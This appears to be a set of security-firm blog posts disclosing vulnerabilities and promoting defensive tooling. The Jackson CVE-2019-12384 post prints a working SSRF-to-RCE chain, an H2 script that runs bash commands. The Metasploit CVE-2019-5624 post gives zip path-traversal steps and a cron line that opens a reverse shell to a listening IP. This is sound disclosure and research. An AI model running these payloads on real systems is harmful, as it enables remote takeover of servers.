In most architectures, a signed short integer is a 2 byte type that can hold both negative and positive numbers. In memory, positive numbers are represented as 1 == 0x0001, 2 == 0x0002 and so forth. Negative numbers are instead represented in two’s complement: -1 == 0xffff, -2 == 0xfffe and so forth. The positive range ends at 0x7fff and the negative range at 0x8000, which enables a signed short integer to hold a value between -32768 and 32767.

Let’s take a look at an example with pseudo-code:

signed short int bank_account = -30000;

Assuming the system still allows withdrawals (e.g. perhaps a loan), the following code will be exercised:

void withdraw(signed short int money){
    bank_account -= money;
}

As we know, the lowest representable value is -32768. What happens if a user withdraws 2768 + 1?

withdraw(2769); //32767

Yes! No longer in debt thanks to integer wrapping. Current balance is now 32767.
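The wrap-around can be reproduced in Python by truncating the result to 16 bits with ctypes, which performs no overflow checking on its integer types. The withdraw_int16 helper is a hypothetical name; it models the two's complement result seen on typical hardware, not what the C standard guarantees.

```python
import ctypes


def withdraw_int16(bank_account: int, money: int) -> int:
    """Subtract `money` and truncate the result to a signed 16-bit value."""
    return ctypes.c_int16(bank_account - money).value


print(withdraw_int16(-30000, 2768))  # -32768
print(withdraw_int16(-30000, 2769))  # 32767
```

One extra coin is enough to move the balance from the lowest representable value to the highest one.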

Checklist:

Verify that the transaction systems and other components dealing with financial arithmetic do not accept negative numbers
Verify integer boundaries, and whether correct signed vs unsigned types are used across the entire codebase. Note that signed integer overflow is considered undefined behavior in C and C++.

4) Password Reset Token Leakage Via Referer

Last but not least, we would like to introduce a simple infoleak bug. This is a very widespread issue present in the password reset mechanism of many web platforms.

A standard procedure for a password reset in modern web applications involves the use of a secret link sent out to the user via email. The secret is used as an authentication token to prove that the recipient had access to the email associated with the user’s registration.

Those links typically take the form of https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320 or https://example.com/passwordreset?token=2a8c5d7e-5c2c-4ea6-9894-b18436ea5320.

But what actually happens when the user clicks the link?

When a web browser requests a resource, it typically adds an HTTP header, called the Referer header indicating the URL of the resource from which the request originated. If the resource being requested resides on a different domain, the Referer header is still generally included in the cross-domain request. It is not uncommon that the password reset page loads external JavaScript resources such as libraries and tracking code. Under those circumstances, the password reset token will be also sent to the 3rd-party domains.

GET /libs/jquery.js HTTP/1.1
Host: 3rdpartyexampledomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Referer: https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320
Connection: close

As a result, personnel working for the affected 3rd-party domains and having access to the web server access logs might be able to take over accounts of the vulnerable web platform.

Checklist:

If possible, applications should never transmit any sensitive information within the URL query string
In case of password reset links, the Referer header should always be removed using one of the following techniques:
- Blank landing page under the web platform domain, followed by a redirect
- Originate the navigation from a pseudo-URL document, such as data: or javascript:
- Using <iframe src=about:blank>
- Using <meta name="referrer" content="no-referrer" />
- Setting an appropriate Referrer-Policy header, assuming your application supports recent browsers only
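The last technique in the list can be sketched with a small WSGI handler built on Python's standard library. The password_reset_app handler and the call_app helper are hypothetical names used only to show where the header is set; any web framework offers an equivalent way to add response headers.

```python
from wsgiref.util import setup_testing_defaults


def password_reset_app(environ, start_response):
    """Hypothetical WSGI handler for the password reset page."""
    headers = [
        ("Content-Type", "text/html; charset=utf-8"),
        # Ask the browser to omit the Referer header on requests made from this page.
        ("Referrer-Policy", "no-referrer"),
    ]
    start_response("200 OK", headers)
    return [b"<html><body>Choose a new password</body></html>"]


def call_app(app, path):
    """Invoke a WSGI app in-process and return (status, headers, body)."""
    environ = {}
    setup_testing_defaults(environ)
    environ["PATH_INFO"] = path
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"], captured["headers"] = status, dict(headers)

    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


status, headers, _ = call_app(password_reset_app, "/passwordreset/example-token")
print(status, headers["Referrer-Policy"])
```

With this header in place, supporting browsers should not attach the reset URL to requests for third-party scripts loaded by the page.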

If you would like to talk about securing your platform, contact us at info@doyensec.com!

Jackson gadgets - Anatomy of a vulnerability

2019-07-22T00:00:00+02:00

Jackson CVE-2019-12384: anatomy of a vulnerability class

During one of our engagements, we analyzed an application which used the Jackson library for deserializing JSONs. In that context, we have identified a deserialization vulnerability where we could control the class to be deserialized. In this article, we want to show how an attacker may leverage this deserialization vulnerability to trigger attacks such as Server-Side Request Forgery (SSRF) and remote code execution.

This research also resulted in a new CVE, CVE-2019-12384, which affects a number of RedHat products.

What is required?

As reported by Jackson’s author in On Jackson CVEs: Don’t Panic — Here is what you need to know the requirements for a Jackson “gadget” vulnerability are:

(1) The application accepts JSON content sent by an untrusted client (composed either manually or by a code you did not write and have no visibility or control over) — meaning that you can not constrain JSON itself that is being sent
(2) The application uses polymorphic type handling for properties with nominal type of java.lang.Object (or one of a small number of “permissive” tag interfaces such as java.io.Serializable, java.lang.Comparable)
(3) The application has at least one specific “gadget” class to exploit in the Java classpath. In detail, exploitation requires a class that works with Jackson. In fact, most gadgets only work with specific libraries — e.g. most commonly reported ones work with JDK serialization
(4) The application uses a version of Jackson that does not (yet) block the specific “gadget” class. There is a set of published gadgets which grows over time so it is a race between people finding and reporting gadgets and the patches. Jackson operates on a blacklist. The deserialization is a “feature” of the platform and they continually update a blacklist of known gadgets that people report.

In this research we assumed that the preconditions (1) and (2) are satisfied. Instead, we concentrated on finding a gadget that could meet both (3) and (4). Please note that Jackson is one of the most used deserialization frameworks for Java applications where polymorphism is a first-class concept. Finding these conditions comes at zero-cost to a potential attacker who may use static analysis tools or other dynamic techniques, such as grepping for @class in request/responses, to find these targets.
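Searching captured traffic for such type hints can be automated. The following is a rough heuristic sketch, not the tool mentioned in this article: find_type_hints and the FQCN pattern are hypothetical, and they only look for "@class" properties and for two-element arrays whose first item resembles a Java class name, the wrapper shape used by the payloads later in this post.

```python
import json
import re

# Rough pattern for a fully qualified Java class name (heuristic, not exhaustive).
FQCN = re.compile(r"^(?:[a-z_][\w$]*\.)+[A-Z_$][\w$]*$")


def find_type_hints(node, path="$"):
    """Yield (json_path, class_name) pairs that look like Jackson type information."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "@class" and isinstance(value, str):
                yield path, value
            else:
                yield from find_type_hints(value, f"{path}.{key}")
    elif isinstance(node, list):
        # Wrapper-array style: ["class.name", {...}]
        if len(node) == 2 and isinstance(node[0], str) and FQCN.match(node[0]):
            yield path, node[0]
        for index, item in enumerate(node):
            yield from find_type_hints(item, f"{path}[{index}]")


body = '["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url": "jdbc:h2:mem:"}]'
for location, class_name in find_type_hints(json.loads(body)):
    print(location, class_name)
```

A hit only suggests that polymorphic typing may be in use; confirming preconditions (1) and (2) still requires manual review.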

Preparing for the battlefield

During our research we developed a tool to assist the discovery of such vulnerabilities. When Jackson deserializes ch.qos.logback.core.db.DriverManagerConnectionSource, this class can be abused to instantiate a JDBC connection. JDBC stands for (J)ava (D)ata(b)ase (C)onnectivity. JDBC is a Java API to connect and execute a query with the database and it is a part of JavaSE (Java Standard Edition). Moreover, JDBC uses an automatic string to class mapping, as such it is a perfect target to load and execute even more “gadgets” inside the chain.

In order to demonstrate the attack, we prepared a wrapper in which we load arbitrary polymorphic classes specified by an attacker. For the environment we used jRuby, a ruby implementation running on top of the Java Virtual Machine (JVM). With its integration on top of the JVM, we can easily load and instantiate Java classes.

We’ll use this setup to load Java classes easily in a given directory and prepare the Jackson environment to meet the first two requirements (1,2) listed above. In order to do that, we implemented the following jRuby script.

require 'java'
Dir["./classpath/*.jar"].each do |f|
	require f
end
java_import 'com.fasterxml.jackson.databind.ObjectMapper'
java_import 'com.fasterxml.jackson.databind.SerializationFeature'

content = ARGV[0]

puts "Mapping"
mapper = ObjectMapper.new
mapper.enableDefaultTyping()
mapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false);
puts "Deserializing"
obj = mapper.readValue(content, java.lang.Object.java_class) # invokes all the setters
puts "objectified"
puts "stringified: " + mapper.writeValueAsString(obj)

The script proceeds as follows:

At line 2, it loads all of the classes contained in the Java Archives (JAR) within the “classpath” subdirectory
Between lines 5 and 13, it configures Jackson in order to meet requirements (#2)
Between lines 14 and 17, it deserializes and serializes a polymorphic Jackson object passed to jRuby as JSON

Memento: reaching the gadget

For this research we decided to use gadgets that are widely used by the Java community. All the libraries targeted in order to demonstrate this attack are in the top 100 most common libraries in the Maven central repository.

To follow along and to prepare for the attack, you can download the required libraries (Jackson, logback-core and, optionally, the H2 database driver) and put them in the “classpath” directory.

It should be noted the h2 library is not required to perform SSRF, since our experience suggests that most of the time Java applications load at least one JDBC Driver. JDBC Drivers are classes that, when a JDBC url is passed in, are automatically instantiated and the full URL is passed to them as an argument.

Using the following command, we will call the previous script with the aforementioned classpath.

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:\"}]"

On line 15 of the script, Jackson will recursively call all of the setters with the key contained inside the subobject. To be more specific, the setUrl(String url) is called with arguments by the Jackson reflection library. After that phase (line 17) the full object is serialized into a JSON object again. At this point all the fields are serialized directly, if no getter is defined, or through an explicit getter. The interesting getter for us is getConnection(). In fact, as an attacker, we are interested in all “non pure” methods that have interesting side effects where we control an argument.

When the getConnection is called, an in memory database is instantiated. Since the application is short lived, we won’t see any meaningful effect from the attacker’s perspective. In order to do something more meaningful we create a connection to a remote database. If the target application is deployed as a remote service, an attacker can generate a Server Side Request Forgery (SSRF). The following screenshot is an example of this scenario.

Enter the Matrix: From SSRF to RCE

As you may have noticed both of these scenarios lead to DoS and SSRF. While those attacks may affect the application security, we want to show you a simple and effective technique to turn a SSRF into a full chain RCE.

In order to gain full code execution in the context of the application, we employed the capability of loading the H2 JDBC Driver. H2 is a super fast SQL database usually employed as an in-memory replacement for full-fledged SQL Database Management Systems (such as PostgreSQL, MSSQL, MySQL or OracleDB). It is easily configurable and it supports many modes such as in memory, on file, and on remote servers. H2 has the capability to run SQL scripts from the JDBC URL, which was added in order to have an in-memory database that supports init migrations. This alone won’t allow an attacker to actually execute Java code inside the JVM context. However, since H2 is implemented inside the JVM, it has the capability to specify custom aliases containing Java code. This is what we can abuse to execute arbitrary code.

We can easily serve the following inject.sql INIT file through a simple HTTP server such as the Python one (e.g. python -m SimpleHTTPServer, or python3 -m http.server on Python 3).

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {"bash", "-c", cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
	return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('id > exploited.txt')

And run the tester application with:

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"
...
$ cat exploited.txt
uid=501(...) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),501(access_bpf),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh)

Voilà!

Iterative Taint-Tracking

Exploitation of deserialization vulnerabilities is complex and takes time. When conducting a product security review, time constraints can make it difficult to find the appropriate gadgets to use in exploitation. On the other hand, the Jackson blacklists are updated on a monthly basis while users of this mechanism (e.g. enterprise applications) may have yearly release cycles.

Deserialization vulnerabilities are the typical needle-in-the-haystack problem. Identifying a vulnerable entry point is an easy task, while finding a useful gadget may be time consuming (and tedious). At Doyensec we developed a technique to find useful Jackson gadgets to facilitate the latter effort. We built a static analysis tool that can find serialization gadgets through taint-tracking analysis. We designed it to be fast enough to run multiple times and iterate/improve through a custom and extensible rule-set language. On average, a run on a 2018 MacBook Pro (i7) takes 2 minutes.

Taint-tracking is a topical academic research subject. Academic research tools focus on very high recall and precision, and the trade-off lies between recall/precision and speed/memory. Since we wanted this tool to be usable while testing commercial grade products and we valued the customizability of the tool itself, we focused on speed and usability instead of high recall. While the tool is inspired by other research such as FlowDroid, the focus of our technique is not to rule out the human analyst. Instead, we believe in augmenting manual testing and exploitation with customizable security automation.

This research was possible thanks to the 25% research time at Doyensec. Tune in again for new episodes.

That’s all folks! Keep it up and be safe!

Electron Security Workshop

2019-07-03T00:00:00+02:00

2-Day Training on How to Build Secure Electron Applications

We are excited to present our brand-new class on Electron Security! This blog post provides a general overview of the 2-day workshop.

With the increasing popularity of the Electron framework, we decided to create a class that teaches students how to build and maintain secure desktop applications that are resilient to attacks and common classes of vulnerabilities. Building secure Electron applications is possible, but complicated. You need to know the framework, follow its evolution, and constantly update and devise defense-in-depth mechanisms to mitigate its deficiencies.

Our training begins with an overview of Electron internals and the life cycle of a typical Electron-based application. After a quick intro, we will jump straight into threat modeling and attack surface. We will analyze the common root causes of misconfigurations and vulnerabilities. The class will be centered around two main topics: subverting the framework and breaking the custom application code. We will present security misconfigurations, security anti-patterns, nodeIntegration and sandbox bypasses, insecure preload bugs, prototype pollution attacks, affinity abuses and much more.

The class is hands-on with many live examples. The exercises and scenarios will help students understand how to identify vulnerabilities and build mitigations. Throughout the class, we will also have a few Q&A panels to answer all questions attendees might have and potentially review their code.

If you’re interested, check out this short teaser:

Audience Profile

Who should take this course?

JavaScript and Node.js Developers
Security Engineers
Security Auditors and Pentesters

We will provide details on how to find and fix security vulnerabilities, which makes this class suitable for both blue and red teams. Basic JavaScript development experience and basic understanding of web application security (e.g. XSS) is required.

General Information

Attendees will receive a bundle with all material, including:

Workshop presentation (over 200 slides)
Code, exploits and artifacts of all exercises
Certificate of completion

This 2-day training is delivered in English, either remotely or on-site (worldwide).

Doyensec will accept up to 15 attendees per tutor. If the number of attendees exceeds the maximum allowed, Doyensec will allocate additional tutors.

We’re a flexible security boutique and can further customize the agenda to your specific company’s needs.

Feel free to contact us at info@doyensec.com for scheduling your class!

Electronegativity 1.3.0 released!

2019-06-11T00:00:00+02:00

After the first public release of Electronegativity, we had a great response from the community and the tool quickly became the baseline for every Electron app’s security review for many professionals and organizations. This pushed us forward, improving Electronegativity and expanding our research in the field. Today we are proud to release version 1.3.0 with many new improvements and security checks for your Electron applications.

We’re also excited to announce that the tool has been accepted for Black Hat USA Arsenal 2019, where it will be showcased at the Mandalay Bay in Las Vegas. We’ll be at Arsenal Station 1 on August 7, from 4:00 pm to 5:20 pm. Drop by to see live demonstrations of Electronegativity hunting real Electron applications for vulnerabilities (or just to say hi and collect Doyensec socks)!

If you’re simply interested in trying out what’s new in Electronegativity, go ahead and update or install it using NPM:

$ npm install @doyensec/electronegativity -g
# or
$ npm update @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

What’s New

Electronegativity 1.1.1 initially shipped with 27 unique checks. Now it counts over 40 checks, featuring a new advanced check system to help improve the tool’s detection capabilities in sorting out false positive and false negative findings. Here is a brief list of what’s new in this 1.3.0 release:

Now every check has an importance and accuracy attribute which helps the auditor to determine the importance of each finding. Consequently, we also introduced some new command line flags to filter the results by severity (--severity) and by confidence (--confidence), useful for tailored Electronegativity integration in your application security pipelines or build systems.
We introduced a new class of checks called GlobalChecks which can dynamically set the severity and confidence for the findings or create new ones considering the inherent security risk posed by their interaction (e.g. cross-checking the nodeIntegration and sandbox flags value or the presence of the affinity flag used across different windows).
Variable scoping analysis capabilities have been added to inspect the Function and Global variable content, when available.
A new single-check scan mode is now provided by passing the -l flag along with a list of enabled checks (e.g. -l "AuxClickJsCheck,AuxClickHtmlCheck"). Another command line flag has been introduced to show relative paths for files (-r).
Electron’s newly introduced BrowserView component, which is meant to be an alternative to the WebView tag, is now supported. The tool now also detects the use of the nodeIntegrationInSubFrames experimental option for enabling NodeJS support in sub-frames (e.g. an iframe inside a webview object).
Various bug fixes and new checks! (see below)

Updated Checks

This new release also comes with new and updated checks. As always, a knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities.

Affinity Check

When specified, renderers with the same affinity will run in the same renderer process. Due to reusing the renderer process, certain webPreferences options will also be shared between the web pages even when you specified different values for them. This can lead to unexpected security configuration overrides:

In the above demo, the affinity set between the two BrowserWindow objects will cause the unwanted sharing of the nodeIntegration property value. Electronegativity will now issue a finding reporting the usage of this flag if present.

Read more on the dedicated AFFINITY_GLOBAL_CHECK wiki page.

AllowPopups Check

When the allowpopups attribute is present, the guest page will be allowed to open new windows. Popups are disabled by default.

Read more on the ALLOWPOPUPS_HTML_CHECK wiki page.

Missing Electron Security Patches Detection

This check detects if there are security patches available for the Electron version used by the target application. From this release we switched from manually updating a safe releases file to creating a routine which automatically fetches the latest releases from Electron’s official repository and determines if there are security patches available at each run.

Read more on the AVAILABLE_SECURITY_FIXES_GLOBAL_CHECK and ELECTRON_VERSION_JSON_CHECK wiki pages.

Check for Custom Command Line Arguments

This check will compare the custom command line arguments set in the package.json scripts and configuration objects against a blacklist of dangerous arguments. The use of additional command line arguments can increase the application attack surface, disable security features or influence the overall security posture.

Read more on the CUSTOM_ARGUMENTS_JSON_CHECK wiki page.

CSP Presence Check and Review

Electronegativity now checks if a Content Security Policy (CSP) is set as an additional layer of protection against cross-site-scripting attacks and data injection attacks. If a CSP is detected, it will look for weak directives by using a new library based on the csp-evaluator.withgoogle.com online tool.

Read more on the CSP_GLOBAL_CHECK wiki page.
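
To give a rough idea of what a weak-directive review involves, here is a minimal sketch in plain JavaScript. It is not the library Electronegativity uses: findWeakCspDirectives, parseCsp and the short WEAK_SOURCES list are hypothetical names introduced for illustration, and the rules cover only a few well-known weak source expressions for script loading.

```javascript
// Hypothetical helper, NOT Electronegativity's implementation: flags a few
// well-known weak source expressions in a Content-Security-Policy string.
const WEAK_SOURCES = ["'unsafe-inline'", "'unsafe-eval'", '*', 'data:'];

// Split a policy string into a Map of directive name -> list of sources.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    const key = name.toLowerCase();
    // Duplicate directives are ignored: the first occurrence is kept.
    if (!directives.has(key)) directives.set(key, sources);
  }
  return directives;
}

function findWeakCspDirectives(policy) {
  const directives = parseCsp(policy);
  // script-src governs scripts when present; otherwise default-src applies.
  const effective = directives.has('script-src')
    ? 'script-src'
    : directives.has('default-src') ? 'default-src' : null;
  if (effective === null) {
    return ['no script-src or default-src directive'];
  }
  const findings = [];
  for (const source of directives.get(effective)) {
    if (WEAK_SOURCES.includes(source.toLowerCase())) {
      findings.push(`${effective} allows ${source}`);
    }
  }
  return findings;
}

console.log(findWeakCspDirectives("default-src 'self'; script-src 'self' 'unsafe-inline'"));
```

A real evaluator checks far more (nonces, hashes, allowlisted hosts with known bypasses, and so on); the sketch only shows the shape of the analysis.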

Dangerous JS Functions called with user-supplied data

Looks for occurrences of insertCSS, executeJavaScript, eval, Function, setTimeout, setInterval and setImmediate with user-supplied input.

Read more on the DANGEROUS_FUNCTIONS_JS_CHECK wiki page.

Detects if the on() handler for will-navigate and new-window events is used. This setting can be used to limit the exploitability of certain issues. Not enforcing navigation limits leaves the Electron application under the full control of remote origins in case of accidental navigation.

Read more on the LIMIT_NAVIGATION_GLOBAL_CHECK and LIMIT_NAVIGATION_JS_CHECK wiki pages.
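
For context, a navigation limit of the kind this check looks for could be sketched as follows. This is a minimal example assuming an origin allowlist is an acceptable policy for the application; ALLOWED_ORIGINS, isAllowedNavigation and limitNavigation are hypothetical names. Electron’s app module is passed in as a parameter so that the snippet also loads in plain Node.js.

```javascript
// Hypothetical allowlist of origins the application is expected to load.
const ALLOWED_ORIGINS = new Set(['https://app.example.com']);

// Returns true only when the target URL parses and its origin is allowlisted.
function isAllowedNavigation(targetUrl, allowedOrigins = ALLOWED_ORIGINS) {
  try {
    return allowedOrigins.has(new URL(targetUrl).origin);
  } catch (err) {
    return false; // unparsable URLs are rejected
  }
}

// `app` is Electron's app module in a real application (an assumption here);
// any EventEmitter with the same events works for experimentation.
function limitNavigation(app, allowedOrigins = ALLOWED_ORIGINS) {
  app.on('web-contents-created', (_event, contents) => {
    const guard = (event, url) => {
      if (!isAllowedNavigation(url, allowedOrigins)) {
        event.preventDefault(); // cancel the navigation or the new window
      }
    };
    contents.on('will-navigate', guard);
    contents.on('new-window', guard);
  });
}
```

In an Electron main process this would be wired up with limitNavigation(require('electron').app) before any window is created.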

Detects if Electron’s security warnings have been disabled

The tool will check if Electron’s warnings and recommendations printed to the developer console have been force-disabled by the developer. Disabling these warnings may hide the presence of misconfigurations or insecure patterns from developers.

Read more on the SECURITY_WARNINGS_DISABLED_JS_CHECK and SECURITY_WARNINGS_DISABLED_JSON_CHECK wiki pages.

Detects if setPermissionRequestHandler is missing for untrusted origins

Not enforcing custom checks for permission requests (e.g. media) leaves the Electron application under full control of the remote origin. For instance, a Cross-Site Scripting vulnerability can be used to access the browser media system and silently record audio/video. Because of this, Electronegativity will also check if a setPermissionRequestHandler has been set.

Read more on the PERMISSION_REQUEST_HANDLER_GLOBAL_CHECK wiki page.
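
As an illustration of what such a handler might look like, here is a minimal sketch that grants a permission only when the requesting origin is explicitly allowed to use it. PERMISSION_POLICY, isPermissionAllowed and installPermissionHandler are hypothetical names, and the policy contents are made up. The Electron session object is passed in as a parameter so the snippet also runs outside Electron.

```javascript
// Hypothetical policy: which permissions each trusted origin may request.
const PERMISSION_POLICY = new Map([
  ['https://app.example.com', new Set(['notifications', 'media'])],
]);

// Deny by default: unknown origins and unlisted permissions are refused.
function isPermissionAllowed(requestingUrl, permission, policy = PERMISSION_POLICY) {
  let origin;
  try {
    origin = new URL(requestingUrl).origin;
  } catch (err) {
    return false;
  }
  const allowed = policy.get(origin);
  return allowed !== undefined && allowed.has(permission);
}

// `ses` is an Electron Session (e.g. session.defaultSession) in a real app.
function installPermissionHandler(ses, policy = PERMISSION_POLICY) {
  ses.setPermissionRequestHandler((webContents, permission, callback) => {
    callback(isPermissionAllowed(webContents.getURL(), permission, policy));
  });
}
```

With this in place, a script injected into an untrusted origin would have its media request denied instead of silently granted.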

…and more to come! If you are a developer, we encourage you to use Electronegativity to understand how these Electron security pitfalls affect your application and how to avoid them. We really believe that Electron deserves a strong security community behind it, and that creating the right, robust tools to help this community is the first step towards improving the security posture of the whole Electron ecosystem.

As a final remark, we’d like to thank all past and present contributors to this tool: @ikkisoft, @p4p3r, @0xibram, @yarlob, @lorenzostella, and ultimately @Doyensec for sponsoring this release.

See you in Vegas!

@lorenzostella

On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)

2019-04-24T00:00:00+02:00

During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the Rubyzip gem. Zip files have always been an interesting entry-point to triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation.

This blog post discusses our results, the “bug” discovered in the library itself and the implication of such an issue in a popular piece of software - Metasploit.

Rubyzip and old vulnerabilities

The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376 where a different handling was implemented by the developers.

# Extracts entry to file dest_path (defaults to @name).
# NB: The caller is responsible for making sure dest_path is safe, 
# if it is passed.
def extract(dest_path = nil, &block)
    if dest_path.nil? && !name_safe?
        puts "WARNING: skipped #{@name} as unsafe"
        return self
    end

[...]

Entry#name_safe? is defined a few lines before as:

# Is the name a relative path, free of `..` patterns that could lead to
# path traversal attacks? This does NOT handle symlinks; if the path
# contains symlinks, this check is NOT enough to guarantee safety.
def name_safe?
    cleanpath = Pathname.new(@name).cleanpath
    return false unless cleanpath.relative?
    root = ::File::SEPARATOR
    naive_expanded_path = ::File.join(root, cleanpath.to_s)
    cleanpath.expand_path(root).to_s == naive_expanded_path
end

In the code above, if the destination path is passed to the Entry#extract function then it is not actually checked. A comment in the source code of that function highlights the user’s responsibility:

# NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While Entry#name_safe? is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments.

In order to verify the library bug we generated a ZIP PoC using the old (and still good) evilarc, and extracted the malicious file using the following code:

require 'zip'

first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end

$ ls /tmp/file.txt
ls: cannot access '/tmp/file.txt': No such file or directory
$ zipinfo absolutepath.zip 
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-13 20:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-13 20:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
$ ruby Rubyzip-poc.rb absolutepath.zip 
Extracting /tmp/
Extracting /tmp/file.txt
$ ls /tmp/file.txt
/tmp/file.txt

This results in a file being created at /tmp/file.txt, which confirms the issue.

As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use without actually verifying how the library works or its specific usage in the codebase.

It would have been vulnerable anyway `¯\_(ツ)_/¯`

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:

def unzip(input)
    uuid = get_uuid()
    # 0. create a 'Pathname' object with the new uuid
    parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")

    Zip::File.open(input[:zip_file].to_io) do |zip_file|
        zip_file.each_with_index do |entry, index|
            # 1. check the file is not present
            next if File.file?(parent_directory + entry.name)
            # 2. extract the entry
            entry.extract(parent_directory + entry.name)
        end
    end
    Success
end

In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the + operator between Pathname objects and strings does not work as many developers would expect and might result in unintended behavior.

We can easily understand its behavior in an IRB shell:

$ irb
irb(main):001:0> require 'pathname'              
=> true
irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
=> #<Pathname:/tmp/random_uuid/>
irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
=> #<Pathname:/path>
irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
=> #<Pathname:/path/traversal>
irb(main):005:0> parent_directory + "../../path/traversal"
=> #<Pathname:/path/traversal>

Thanks to the interpretation of the ../ by Pathname, the argument to Rubyzip’s Entry#extract call does not contain any path traversal payloads which results in a mistakenly supposed “safe” path. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation.

From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix and Windows-specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application.

Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn’t find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot.

However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability.

The official documentation explains that:

After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious .rb in the /config/initializers folder which will be loaded at web server (re)boot.

Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework

Going through the source code, we were able to quickly identify several files that are using the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in zip.rb file (line 157) that is responsible for importing a Metasploit ZIP File:

 data.entries.each do |e|
      target = ::File.join(@import_filedata[:zip_tmp], e.name)
      data.extract(e,target)

As with the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps:

Create a file with the following content:
* * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
Generate the ZIP archive with the path traversal payload:
python evilarc.py exploit --os unix -p etc/cron.d/
Add a valid MSF workspace to the ZIP file (so that MSF extracts it; otherwise it will refuse to process the ZIP archive)
Set up two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell)
Log in to the MSF Web Interface
Create a new “Project”
Select “Import”, “From file”, choose the evil ZIP file and finally click the “Import” button
Wait for the import process to finish
Enjoy your reverse shell

Conclusions

In case you are using Rubyzip, check the library usage and perform additional validation against the entry name and the destination path before calling Entry#extract.

Here is a small recap of the different scenarios (as of Rubyzip v1.2.2):

Usage	Input by user?	Vulnerable to path traversal?
entry.extract(path)	yes (path)	yes
entry.extract(path)	partially (path is concatenated)	maybe
entry.extract()	partially (entry name)	no
entry.extract()	no	no

If you’re using Metasploit, it is time to patch. We look forward to seeing an MSF module for CVE-2019-5624.

Credits and References

Credit for the research and bugs goes to @voidsec and @polict.

This work has been performed during a customer engagement and Doyensec 25% Research Time. As such, we would like to thank our customer and Metasploit maintainers for their support.

If you’re interested in the topic, take a look at the following resources:

Subverting Electron Apps via Insecure Preload

2019-04-03T00:00:00+02:00

We’re back from BlackHat Asia 2019 where we introduced a relatively unexplored class of vulnerabilities affecting Electron-based applications.

